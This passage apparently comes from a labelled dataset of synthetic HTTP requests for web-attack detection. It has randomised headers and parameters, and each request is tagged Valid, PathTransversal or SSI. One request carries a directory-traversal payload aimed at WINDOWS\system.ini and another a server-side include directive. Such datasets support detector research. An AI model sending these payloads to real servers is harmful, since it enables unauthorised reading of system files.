Via: 8.4 www.iW4eem.jpg:03, 3.7 www.Ideue.jpeg
Transfer-Encoding: gzip
Upgrade: Cdr/9.5, gton/2.2
Warning: 633 208.217.55.100 "oooedreIyoibnl" 
X-Forwarded-For: 114.221.1.72
X-Serial-Number: 180006771831212
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12128
Start - Id: 36150
class: PathTransversal
GET /dRNuZafJLvY/nn/tgVJ/4Rm/xoff7lRhhv/iqdrWd0/sLGd3CpMGpaMUEuo/vnjS@I-xmzZnqT/aertewsa.png?txs2=4573&cte0ossomrrda=ezC.Zq&tityyesaboid=akhtemhjestgao&T2GFYtylU=082714921&reEvo=nFUyDAG6&uzgeennpe=asnsaaehrsiv&6asl5oioabmIi=2&ElaietaotbjR7m=aevallwsx2-t1esro+&9e=97473&hrystn=gpeefe5tqd&zvLA=+ljo%7CndiV1o%26fa&enuhuPEHie4e=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&lnl=0nHr HTTP/1.0
Host: 220.122.91.180
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 52.138.136.254
Cookie: saminon7imgr-=111824;Dl-qtRTZZvbk=nXrl;pdv3qamii111M6=dnN
Cookie2: $Version="9"
Date: Wed, 21 Jun 06 09:21:37 CET
ETag: W/"ns9fmDOQwg1@j3lH"
Expect: etoihr
From: aitunw@tegatgpn.uk
If-Modified-Since: Mon, 24 Jan 05 21:29:25 CET
If-Unmodified-Since: Sun, 26 Dec 04 09:23:09 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3336
MIME-Version: 8.6
Pragma: uaid3=inumsrod
Proxy-Authorization: Basic eWl1NWVlZTpIc3NkYWE=
Authorization: NTLM bWNoOHN4ZWh1bElpZWRrcmVsTWN0d2hpb2FiYXJldG92dWV1bnVvaQ==
Range: 375-
Referer: http://www.aatdlr.st/b3jne/ec62nte/dfEIdppl.jsp
TE: gzip;q=0.6,trailers
Trailer: Expect
User-Agent: Mozilla/1.8 (compatible; MSIE 8.2; Mac OS X; rhas; crlrw4tta; zc0rit5eil)
UA-CPU: PowerPC
UA-Disp: 4342,924,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9880x9117
Via: HTTP/0.6 www.raaqdy.tiff, 4.8 www.qpln2Aee.html:042, 9.3 www.qcaIi.shtml
Transfer-Encoding: compress
Upgrade: bhte/9.7, rertro/9.5
Warning: 851 141.46.27.130 "hnaniEfhYuniiebi" 
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 6486734154619358
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36150
Start - Id: 29665
class: Valid
GET /epaY4dloisHnmiAaec/iTpEdmnAvY1/aCHacceptC4/pdlit52tkitmTyrus.dll?DUCaHXCmHU=odNZ5Fz21WO&Vak1i6td=dnTaeadrs&1cin=78&tex=gorg69zsLz-&Scrtb6o=seaO&teIh4laer0=%7Csy%24s&sVcsystemVv5nph-2J=emaoUs%7CrhHt5r&_tUu1pbYiIBall=40&lsihsnaTmm=%5Bnwindow.open&nztdvscothyA=vLandioeehwcdcr&Ekdaty=2e8qt&K1dy3J7updatei6=h&aaco2Eef=r%3E HTTP/1.0
Host: 138.227.82.58:18229
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-7, utf-7, big5
Accept-Encoding: compress;q=0.3, identity, compress;q=0.5
Accept-Language: bn-E2, rexnoto-dwaT;q=0.6, w-ar, Rps-iY8wneer, u-n;q=0.6
Cache-Control: only-if-cached
Client-ip: 253.106.46.66
Cookie: eor6iaIb=ddg;i33=126785685;8frddrorRse8fk=04
Cookie2: $Version="1"
Date: Sun, 22 May 05 12:22:16 GMT
ETag: W/"qvZR5YtlczZydo5A-@"
Expect: esiee
From: u3rtt@gl4Lrobr.com
If-Modified-Since: Sat, 02 May 09 06:14:31 GMT
If-Unmodified-Since: Fri, 31 Dec 04 13:16:14 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Nov 09 10:32:45 CET
Max-Forwards: 133
MIME-Version: 8.3
Pragma: sejioe=hi
Proxy-Authorization: NTLM N2kzZG9obnRhY2llZWRDemRhYmhueGVlcmFsbnJjb2NjZW9ybW9uWXM=
Authorization: eoth 5hr3m1zo=mdObeosa
Range: 0-345
Referer: /erb0i.pdf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: rrq7Ae/4.2.7
UA-CPU: 68000
UA-Disp: 844,9536,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8055x615
Via: 3.1 166.37.38.51, HTTP/5.2 204.37.221.139, sHOto/3.0 35.55.252.166
Transfer-Encoding: t88Ar
Upgrade: nbyrR/0.6, hSeaai/0.0
Warning: 322 9.218.91.57 "Efrfs" "Mon, 12 May 08 03:38:33 UTC"
X-Forwarded-For: 207.227.126.195
X-Serial-Number: 149051815209
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29665
Start - Id: 8415
class: Valid
GET /l-A3fJC8AkRtYw/rH/uxipursinotll2aleht/9PO54M4a/aXiIr0/mW0vprl.mspx? HTTP/1.1
Host: 16.3.87.145:80
Connection: close
Accept: video/mpeg;q=0.3, application/*
Accept-Charset: iso-8859-9, x-mac-ce, big5;q=0.0, koi8-r;q=0.6, windows-1257
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 199.138.60.143
Cookie: 6osuanycksi3o=621488;8aeiiocAtt6=execxgjn;nddb=lco;uo.mlsZ@tq8YI=i.vqzUdz_m;6WtTO9L-Shttp=idwnn3;tsmiitero=ksj
Cookie2: $Version="94"
Date: Wed, 26 Jul 06 22:21:29 GMT
ETag: W/"vhoIZfNY4LM5Difz"
Expect: 100-continue
From: owtfe@Psfnit.ch
If-Modified-Since: Tue, 16 Dec 08 22:41:22 GMT
If-Unmodified-Since: Tue, 28 Jun 05 03:17:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 82
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic cnJ0RURhWDpvdWV2bw==
Authorization: cooda Eg8c=shceEAae
Range: 994131-66069
Referer: http://dcaocSw.gov/neai.html
TE: trailers
Trailer: Accept-Encoding
User-Agent: rL1po9Qp77 http://www.iloTN.de
UA-CPU: MIPS
UA-Disp: 9749,6112,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 928x374
Via: 9.4 111.207.105.120
Transfer-Encoding: gzip
Upgrade: dvu6s/4.4
Warning: 397 www.asdvtt.tiff "stt7oAr5aej" 
X-Forwarded-For: 193.245.215.144
X-Serial-Number: 426956311564
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8415
Start - Id: 30197
class: Valid
GET /5OreJ/eaAin/r0HJruAi2jWzV1mv.cfm?cbg=saeou3&Zsaaarei=1453&-NHM=4rrh&ithnhaOs=insert&fiqRn=50087583 HTTP/1.1
Host: 166.175.203.234
Connection: qhmtz
Accept: */*;q=0.7
Accept-Charset: iso-8859-8-i;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 52.71.28.255
Cookie: AjL_=;esdiv;8eSknegameq=0
Cookie2: $Version="8"
Date: Thu, 22 Jun 06 14:13:27 UTC
ETag: W/"cxq2qJsQECsfzqrbt0"
Expect: gCiaud=uaseai;Iittoha
From: wieAim@aawfi.fr
If-Modified-Since: Wed, 03 Oct 07 09:37:25 UTC
If-Unmodified-Since: Sat, 12 May 07 19:41:08 GMT
If-Match: "zD-Lcn0gcl2JEA."
If-None-Match: "JqIA13RmFLVCRFV57Ep"
If-Range: "FzBQQdy6scR_8Oqjg"
Max-Forwards: 8928
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic bWVmT2lpemk6bm5lZWNlM3g=
Range: 8-
Referer: /i9nr/o3oetrc.txt
TE: gzip,gzip
Trailer: Authorization
User-Agent: Mozilla/2.0 (X11; U; Open BSD i586 1.9; ht-nE; rv:7.4.7) Gecko/45155334
UA-CPU: x86
UA-Disp: 058,5611,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 035x8386
Via: 8.4 www.eehsl4le.js:04, o3tl/3.7 www.Mwfhsau.jpg:9
Transfer-Encoding: identity
Upgrade: tz8s/1.1, eta/2.9, ypera/7.0, v8r/7.9, hNu/3.8
Warning: 602 32.88.153.167:23729 "hrge" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 19194011026
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30197
Start - Id: 1274
class: Valid
GET /eFoUo-S29udYjKqb/oe1ccst03/cAikEuahieEuaso/ohp6z2ar5l.exe?evalVvN5l4V=731486&rk1Nt3ew8dabt=3&52u6sbheraei=372&seyt9=s9s6rtihtpassenisn&tl=sHGfZNFno%40&mp=elu%3ANe1Re1m&WadminHc38g1X4=158&e6nt=4ti2h8erdp HTTP/1.1
Host: 104.40.1.243
Connection: keep-alive
Accept: video/mpeg;q=0.7, text/xml, application/*
Accept-Charset: utf-7;q=0.4, iso-8859-7, big5, us-ascii, windows-1254
Accept-Encoding: 
Accept-Language: oij-sCb;q=0.6
Cache-Control: min-fresh=70865
Client-ip: 32.114.105.164
Cookie: acpAeriemqRT=ulee8tmgy( s;yrr(i|;M0vbscriptallMKXC2AR=afjcGBx
Cookie2: $Version="5"
Date: Mon, 21 Sep 09 04:15:14 UTC
ETag: W/"kvOQnVOGXdbNil@"
Expect: 100-continue
From: o2yoIi@nrSybWihss.biz
If-Modified-Since: Thu, 14 Apr 05 10:11:50 GMT
If-Unmodified-Since: Tue, 04 Jan 05 09:52:14 UTC
If-Match: "XlcxOcA7HhAtw74"
If-None-Match: "rq4sAV9X9Gi7t-e"
If-Range: *
Max-Forwards: 5114
MIME-Version: 9.7
Pragma: ni='e'
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: Basic Y3BDc0Zlcjp4WW5uc2I=
Range: 877225-,5968-55715
Referer: http://ao9xgted.org/cnaletak.gif
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/6.8 (X11; U; Linux i586 9.1; iN-sc; rv:2.9.2) Gecko/09538862
UA-CPU: Sparc
UA-Disp: 7057,1864,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7486x696
Via: 6.1 www.mr1ua.jpg, 8.2 www.b9jXel.htm, 0.4 www.eeno.gif
Transfer-Encoding: identity
Upgrade: mtc/2.4, 2tb/3.3, uMmd0b/9.5, oua/7.8, sdtbe/1.8
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 637706469281723
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1274
Start - Id: 18730
class: Valid
GET /rv0y0UQ5MzvtXE/i3PtvvOA79W5EIs/aertlyaWnIralasa/boonwas/rm7enR8mbnoE0/wxg/aelcipu7dhRyj9egyk/hG-879g_NA/e6jrnul1Fhntcbnt/sock_stream3UNxtermqD/wI5rayDe/jNE%umE1AXOuE_iv.asmx?mn=ndn&cecqotdpst=9&qVXvL=%40empasswdda%24uniones%3Dim&ah=gu&edeoa2oedssoszt=yyRrR1f&O3llY9tBpassthruKS=hgukegnaiwat&nfraShctf4tniyo=87163 HTTP/1.1
Host: www.nppknatw3.uk:636
Connection: te4n
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 219.245.151.93
Cookie: t3nRh=ter9elsnotieajtq;lstuHEeettt=ecs~hepHeed4
Cookie2: $Version="3"
Date: Thu, 27 Oct 05 01:34:25 CET
ETag: W/"zvnk41a5Tn4k1k8ZK"
Expect: 9asis
From: s9urn@T3rE4ome.com
If-Modified-Since: Sat, 24 Jan 04 24:54:34 UTC
If-Unmodified-Since: Tue, 30 Sep 08 04:08:21 UTC
If-Match: "Z94xX8e6AKIsz9FlgP"
If-None-Match: "k3ldPy2Vy2xCfB0.f3BC"
If-Range: *
Max-Forwards: 2563
MIME-Version: 0.0
Pragma: fbc='E8'
Proxy-Authorization: Basic bW5udHphbTpSUmFqaQ==
Authorization: u4eer tiwaj=tTpura8
Range: 8-8
Referer: /kmhotvr/cfc54i/ET8e3nu/tNnqtTlt.php3
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/9.9 (compatible; steqwat; Win98; iyte; eeept)
UA-CPU: 68000
UA-Disp: 752,4892,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4616x9503
Via: 3.9 120.27.22.67, 4.3 www.eipnhOp.png, 2.7 150.31.164.140
Transfer-Encoding: azenr
Upgrade: ayiai/8.8, ryiyaS/1.2
Warning: 283 96.43.133.65:48460 "eUam8fnoeiuksnontNn" 
X-Forwarded-For: 225.250.72.17
X-Serial-Number: 317895
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18730
Start - Id: 4849
class: Valid
PUT /cd1uJMAL/tcGwdEME_FBuJ.qrcF/gi5arr/ereofe.dll? HTTP/1.0
Content-Length: 50
Content-Language: ia
Content-Encoding: compress
Content-Location: http://8mspeco.cz/eEs1hO/De6e4tw/Dqtm/aw4hrI/iwr1e.fgf
Content-MD5: ZWNlYmJneWhldGFhd290ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Dec 08 08:11:19 GMT
Last-Modified: Tue, 25 May 04 17:21:38 CET
Host: 152.14.104.66
Connection: 4cttn9
Accept: video/*;q=0.7
Accept-Charset: windows-1251;q=0.2, utf-8;q=0.1, windows-1255;q=0.6, x-mac-ce;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 188.228.34.221
Cookie: ndsnnkApansSym=enepcsElli;yrwksneiRec=62;i9oeqdC=72989047
Cookie2: $Version="95"
Date: Tue, 19 Apr 05 13:44:24 CET
ETag: "lUqoSzzB.@-hL@tfIz"
Expect: 2Erut
From: se9x4ani@iircstnutn.gov
If-Modified-Since: Sun, 29 Jan 06 22:37:28 GMT
If-Unmodified-Since: Fri, 20 May 05 03:11:50 UTC
If-Match: "tRlTM.M-AJX@YJl"
If-None-Match: *
If-Range: "Z-7o_twU9O-0TexL.nax"
Max-Forwards: 5436
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: NTLM aTN0OGhtbnRhYXV2YWhlbEVmcHZxck9nYXNYbnRhaGVjYWFhYWR1dG90aGVkaQ==
Range: -636874,7776-
Referer: /n5oznu/HeeoT/fxdflntL/ieen.mdb
TE: gzip,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.3 (compatible; MSIE 0.7; SunOS sun4u; pcina; neti; ltbAc9eh)
UA-CPU: Sparc
UA-Disp: 092,446,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 812x666
Via: 8.2 24.21.207.63, 3.9 www.seeYr.tiff
Transfer-Encoding: identity
Upgrade: isg/5.2, j8zf/3.1
Warning: 714 www.gNbN.shtml:866 "rlagij2neSygelcdhn9a" "Tue, 10 Mar 09 19:39:56 UTC"
X-Forwarded-For: 191.124.85.186
X-Serial-Number: 688276935690
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

VU86EHGr=gn8K&RbiAni=pmrilde5&aEsps7=lotelnoiijhio

End - Id: 4849
Start - Id: 20843
class: Valid
GET /shMB13IOF9FIemN.j8g2/aolneEs.mspx?derle8sbe=405420539&aAotndpiulie=631640&rxms=886152&dhTMl0JG4=6684&eiNsoe=window.opent2perl5+iw%26%3At&Hc=ee%40vp4l&9npnie=e9opZnhF-1r7&ffsimfj5svM=oE3&dhInmkaign=00&en=aeor- HTTP/1.0
Host: www.hrETuBe.com
Connection: close
Accept: video/*, text/*, image/png
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.0, gzip, identity, compress
Accept-Language: cneprtw-e0sexe, eb-m2aebe, t-Npe, 5caenasa-lusopy, iw-r;q=0.8
Cache-Control: no-cache
Client-ip: 234.60.18.141
Cookie: 2ae=85693720;s7ZmXseK@Aez=havingteffh;ewms5m2tnst5sr=Us@2IlVcaIts%u2ehEr;twari8tP=group bylmzm9s
Cookie2: $Version="53"
Date: Mon, 25 Jul 05 21:42:00 CET
ETag: "yoHsLODn4AP.W-iZy"
Expect: 100-continue
From: dnCSe5st@sqeawRtsa.cz
If-Modified-Since: Sat, 24 Apr 10 19:43:55 CET
If-Unmodified-Since: Tue, 21 Aug 07 07:58:39 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 16
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM eWhIc25sb3NvbGNiZTRvOGVmZXBxcGhiaWdzaXNlZTV5dHRvcg==
Authorization: Digest algorithm=MD5
Range: -8
Referer: http://niytxpoc.net/rsn6d/nqrea0.htm
TE: deflate,deflate;q=0.2,trailers
Trailer: Referer
User-Agent: Mozilla/2.7 (X11; U; SunOS sun4u 4.7; t0-l7; rv:6.3.8) Gecko/53167005
UA-CPU: 68000
UA-Disp: 9899,814,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 073x1675
Via: ehs/5.0 92.36.132.170, 8.6 191.194.56.186, 7.5 67.224.194.25
Transfer-Encoding: deflate
Upgrade: deqrsi/3.0
Warning: 895 240.109.248.223 "xes3Sgad2essEorscnn" "Tue, 16 Mar 04 21:51:36 GMT"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20843
Start - Id: 39410
class: SSI
GET /rn.js?afeiclh=t7mXPVTtqPk&.fRQzyve=5Se7taeorl3eonnje&te9ry7=%3Ed&Ee6tHldwacsyn=4882756&gee2OeEse2et0t=488579130&q01plog=qdropbgddBehed%25ah&K0o=ueuk9kz&n1ujtCtleaaa=37242940&aqsdsZa=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&rAcehai=letatu3ka2de HTTP/1.0
Host: 120.171.238.102
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: compress, deflate, gzip;q=0.2
Accept-Language: poeyasos-nIsBcf
Cache-Control: no-transform
Client-ip: 123.202.136.228
Cookie: imLYte=384201;accepta0Jn0O8qlink=029109
Cookie2: $Version="22"
Date: Wed, 06 Jul 05 14:44:59 CET
ETag: "LyIj7xs_CNOS2ornHlwF"
Expect: 100-continue
If-Modified-Since: Sun, 10 Feb 08 17:51:02 UTC
If-Unmodified-Since: Wed, 22 Feb 06 23:18:52 UTC
If-Match: *
If-None-Match: *
If-Range: "j6AsyHZykZn6ODBm-yRN"
Max-Forwards: 0
MIME-Version: 6.3
Pragma: ihcj=tCeaeit
Proxy-Authorization: Basic bG1uZWg3cDI6eXRkR3M=
Authorization: Basic c2kyQjpnb3Zp
Range: 747370-38132,5734-
Referer: /edtr/ohox/rgmtler/hsatgihi/l0hlps.doc
TE: trailers,trailers,chunked;q=0.6
Trailer: Via
User-Agent: gyTzup http://www.ncbhd.gov
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-Color: color8
Via: ttk/1.9 www.snciFds.js, HTTP/0.9 10.224.148.192, qsyf/2.3 199.247.41.220
Transfer-Encoding: gzip
X-Serial-Number: 3653526354532
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39410
Start - Id: 25914
class: Valid
GET /nEOwbj4wcoetueouR7as/igFLyk7fedocumentCv/hGuihGrb1E9.aFb.jsp?wceoau=+c%298&otosna=scgsca2&ltWnotdntdipnjm=8608943&d6haioecbri=133&GXrandg7EEk=pelIiaTlk0e&tt7xideceete1=7kXF&KCAGGOwp=t HTTP/1.1
Host: 155.96.144.82
Connection: close
Accept: video/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: szeS-k1ohnsp, yn-vTwp5va, Cdior0e-d;q=0.7
Cache-Control: uast=lidfbs
Client-ip: 86.110.54.19
Cookie: dta65Azaf=niMz;tiy92ptr=Je6htdoj;logCTVEbodyUTLdc@=yeAe;othsa=98;oyur=hlgr=;iuaim6beus=5747917562
Cookie2: $Version="4"
Date: Fri, 23 Jan 09 12:49:11 GMT
ETag: "HKf-@8Rt2Y50MRUa"
Expect: 100-continue
From: gosesow@ihn6lcen.de
If-Modified-Since: Mon, 31 Jul 06 22:39:59 UTC
If-Unmodified-Since: Tue, 15 Jul 08 08:13:35 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic aHJmZWlhYTpoaWV5
Authorization: NTLM c05jTmlUaGlyZXkxZUlybHN5MWFvNFdFd2VuaDJvQWd4Z3B1OGhza202c3U=
Range: -1130,110984-785,-31
Referer: http://www.nplxdsu.org/eawHeE.tiff
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: Mozilla/9.9 (Windows; U; Win 9x 3.3; xd-ti; rv:7.1.6) Gecko/59719356
UA-CPU: PowerPC
UA-Disp: 859,629,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 069x973
Via: FTP/2.3 145.161.69.86
Transfer-Encoding: uoiee2; eeennie=orzhihrn
Upgrade: rRETsr/8.0, eda7ou/6.7
Warning: 985 www.gyoey.jpg "3nhBmta" 
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1807971586692
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25914
Start - Id: 26538
class: Valid
GET /uaacme/-DD2m/ptx.dll?imev=+CUiyt%3Eiei%3Cac&ieos46rna3=asseehH&udwhi=e42axseese&htlb4itxiieE=tgs+ArD%2F&gPpl9=oejbs&tbatcn=7 HTTP/1.0
Host: www.g5irceu.be
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312, iso-8859-5;q=0.1, windows-1250, x-mac-chinesetrad, x-mac-arabic
Accept-Encoding: *;q=0.4
Accept-Language: lf3qteI-l, 2nUjoif-oa;q=0.7
Cache-Control: max-age=575
Client-ip: 9.2.33.29
Cookie: 7chsstibr=5756044;emtonteatd=yp87lkDastotnk5n;oanph-MG5=83
Cookie2: $Version="58"
Date: Thu, 16 Jun 05 05:39:25 UTC
ETag: W/"etaGvR5q5@aEoYpWCD"
Expect: 100-continue
From: 2oida@icenhE.de
If-Modified-Since: Tue, 27 Jan 09 01:16:31 CET
If-Unmodified-Since: Sun, 02 Jul 06 19:38:54 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 15 Apr 04 18:33:27 GMT
Max-Forwards: 66
MIME-Version: 5.3
Pragma: e=ilN0a
Proxy-Authorization: CrcHl 7otge=ez2Tr
Authorization: NTLM cnRlbGk4YXJkaHNnTW5jRmE3c29vd3Q4dG44YWRlblRlZ1VvbzdvZWhlZzk4ZQ==
Range: -576
Referer: /AeYsak.cgi
TE: gzip;q=0.9,deflate
Trailer: Range
User-Agent: utiym0Insa5
UA-CPU: MIPS
UA-Disp: 7109,7775,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 987x6257
Via: HTTP/5.5 www.jtSs.gif
Transfer-Encoding: compress
Upgrade: t7nkm/4.3, ho2Bts/8.8, n0ao/6.2, teo/7.9
Warning: 248 51.93.56.9 "9mucan7xiiw9go4ettes" "Sat, 18 Mar 06 14:43:39 CET"
X-Forwarded-For: 240.213.194.27
X-Serial-Number: 693373977262
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 26538
Start - Id: 8409
class: Valid
GET /heOtarrea/itEp/5cv/8i/ncnSevD7t/edktPKiiSemd9Na/sio30d/5plStH89VjlkIVt/ksrhle9ih.tiff? HTTP/1.0
Host: www.ap93.net
Connection: hrlsy
Accept: audio/*;q=0.9, image/*;q=0.9, text/html;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: y8-tunE;q=0.8, t-n75Ic;q=0.5, 7o32pe-O, a3h-nD1;q=0.8, hust6mt-aYSNde
Cache-Control: Denp=sree
Client-ip: 234.41.11.139
Cookie: aioda=eetcmfi;s9ak=aw4duogRssyal;aEataec2iau=3978637;zrLd9ion=) oE
Cookie2: $Version="5"
Date: Tue, 19 May 09 03:03:54 UTC
ETag: W/"vhoIZfNY4LM5Difz"
Expect: meswe=yem4tw
From: vrT4@rhtowie.net
If-Modified-Since: Mon, 05 Sep 05 09:56:30 CET
If-Unmodified-Since: Thu, 03 Sep 09 10:12:13 GMT
If-Match: "XLxC5VkdXnFzXp@KM"
If-None-Match: "Rwvrh9Z-jQd15vuDjpPO"
If-Range: Sat, 10 Apr 04 06:10:48 UTC
Max-Forwards: 8
MIME-Version: 8.4
Pragma: neEsNe='irieu'
Proxy-Authorization: Basic cnJ0RURhWDpvdWV2bw==
Authorization: g8TE vcOiv=c7ie5q
Range: 994131-66069
Referer: /juzvp/sontl/9cesth/nGmy.gif
TE: trailers,trailers,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/8.5 (X11; U; SunOS sun4u 7.3; at-Il; rv:6.6.5) Gecko/68754739
UA-CPU: MIPS
UA-Disp: 9749,6112,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 928x374
Via: 9.4 111.207.105.120
Transfer-Encoding: deflate
Upgrade: dvu6s/4.4
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 193.245.215.144
X-Serial-Number: 426956311564
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8409
Start - Id: 17218
class: Valid
GET /bthgy2M/qmnssmeaats/74anDwynetcatOoTf75O.tiff?11P@WNP=g6AjCDjeXr&scl7rna=8&ehdjOTo=anocnsEionrh&26nph-L=731&9tOywi=ibgsound+%40e&s8W=replacenialu+&abhthvoEsoso=httpiemgtgoallasi%3Ee&aincGrmgtiuisit=lib%5CrtR5zI%27Ld HTTP/1.0
Host: 2.189.43.195:00
Connection: keep-alive
Accept: audio/*;q=0.0, text/*
Accept-Charset: us-ascii;q=0.6, iso-8859-3;q=0.2, iso-8859-15
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=23
Client-ip: 156.171.102.35
Cookie: wTaaZbfcti7=eWMsnqy7G
Cookie2: $Version="005"
Date: Tue, 21 Feb 06 09:43:35 GMT
ETag: "VnVj3T3gmtLTjcIn"
Expect: xcaEa=he8a2wla;ivps4ctq=nctR
From: tytiiae@0oytu.it
If-Modified-Since: Tue, 23 Sep 08 14:54:00 UTC
If-Unmodified-Since: Mon, 25 Aug 08 18:35:22 GMT
If-Match: *
If-None-Match: "dXms_3YWWDB1E54"
If-Range: *
Max-Forwards: 8271
MIME-Version: 7.4
Pragma: ref='iadean6l'
Proxy-Authorization: dRini wnbheet=snah
Authorization: NTLM dHNhdGs4Y2dheWVoNm5ORWVpaG5JZ2VhbnNoYWFlZWRzZWViZWUwcjlu
Range: 601-
Referer: http://www.xgsou.ch/sort.pdf
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: oentunQ/0.1.6
UA-CPU: 68000
UA-Disp: 121,6829,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4168x797
Via: 3.3 www.x5Thtrq.html, 1.3 58.112.45.254, FTP/4.6 www.Au540l.gif
Transfer-Encoding: meeH
Upgrade: ezft/4.3, hgob/9.9, uqy1/8.3, lh5t/1.6, Das8c/2.5
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 534738047598763
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17218
Start - Id: 32255
class: Valid
GET /r330wjLOjKpfPdRpGeC/iytiai5tyre/DHeSnO/ahNg/InsyamremIna5eaIo/Bs/ckbn4JCjItM1c4szO.mdb?dssvgn=nB4VJi%40UchZs&rPyKcm=uSs.hB7&wn2=hOmxq8aEQ_&2n4lAu56utt1=+ed%5Cb&aRolEiogtien=tnullm&p2=5450165&C_6rkIs=0387007&eecexeyhyntat=6&onfsy=andien&tersizoeena0=538&3mKadmin=9extr2n6zaftm6lP HTTP/1.1
Host: www.nstmiir2.net:80
Connection: 4ewrntat
Accept: */*
Accept-Charset: windows-1257;q=0.8, iso-8859-6
Accept-Encoding: deflate;q=0.0, deflate, identity;q=0.2, compress;q=0.7
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 166.187.143.214
Cookie: de=xcreif9w6od0kgn;GS.L=aEagQ;asEa=oiEgu4et;axsys4=dnIsjybwoaaomet;isN=124587
Cookie2: $Version="518"
Date: Mon, 29 Nov 04 11:34:09 CET
ETag: W/"mPGh3SeD1JfvyjkXwgc1"
Expect: dEvf=ealzsyq
From: ajtRne@yawe.com
If-Modified-Since: Thu, 02 Sep 04 02:05:28 CET
If-Unmodified-Since: Wed, 05 Nov 08 02:37:24 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Aug 08 04:38:14 GMT
Max-Forwards: 14
MIME-Version: 7.8
